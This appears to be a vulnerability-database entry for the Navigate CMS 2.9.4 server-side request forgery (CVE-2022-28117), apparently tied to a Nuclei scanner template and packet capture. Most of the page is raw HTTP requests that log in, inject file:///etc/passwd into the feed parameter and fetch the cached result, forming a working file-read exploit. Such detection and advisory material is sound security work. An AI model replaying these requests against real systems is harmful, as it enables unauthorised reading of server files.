| Title | Navigate CMS 2.9.4 - Server-Side Request Forgery |
|---|---|
| Author | theabhinavgaur |
| Severity | Medium |
| Impact | An attacker can exploit this vulnerability to bypass security controls, access internal resources, and potentially perform further attacks. |
| Remediation | Upgrade to a patched version of Navigate CMS or apply the vendor-provided patch to mitigate the SSRF vulnerability. |
| CVSS Score | 4.9 |
| EPSS Score | 0.67131 |
| CVE ID | CVE-2022-28117 |
| CWE ID | CWE-918 |
| Tags | cve cve2022 authenticated packetstorm ssrf navigate cms lfi intrusive naviwebs vuln |
Navigate CMS 2.9.4 is susceptible to server-side request forgery via feed_parser class. This can allow a remote attacker to force the application to make arbitrary requests via injection of arbitrary URLs into the feed parameter, thus enabling possible theft of sensitive information, data modification, and/or unauthorized operation execution.
GET /navigate/login.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/603.1.10 (KHTML, like Gecko) Version/10.1 Safari/603.1.10
Connection: close
Accept-Encoding: gzip
POST /navigate/login.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Connection: close
Content-Length: 435
Content-Type: multipart/form-data; boundary=---------------------------123456789012345678901234567890
Accept-Encoding: gzip
-----------------------------123456789012345678901234567890
Content-Disposition: form-data; name="login-username"
PWItD1
-----------------------------123456789012345678901234567890
Content-Disposition: form-data; name="csrf_token"
q5D6KP
-----------------------------123456789012345678901234567890
Content-Disposition: form-data; name="login-password"
ryJ4Xf
-----------------------------123456789012345678901234567890
POST /navigate/navigate.php?fid=dashboard&act=json&oper=feed HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.7 Safari/605.1.15
Connection: close
Content-Length: 42
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
limit=5&language=en&url=file:///etc/passwd
GET /navigate/private/1/cache/0f1726ba83325848d47e216b29d5ab99.feed HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.7.20) Gecko/ Firefox/5.0
Connection: close
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-28117.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-28117.pcap
N/AN/A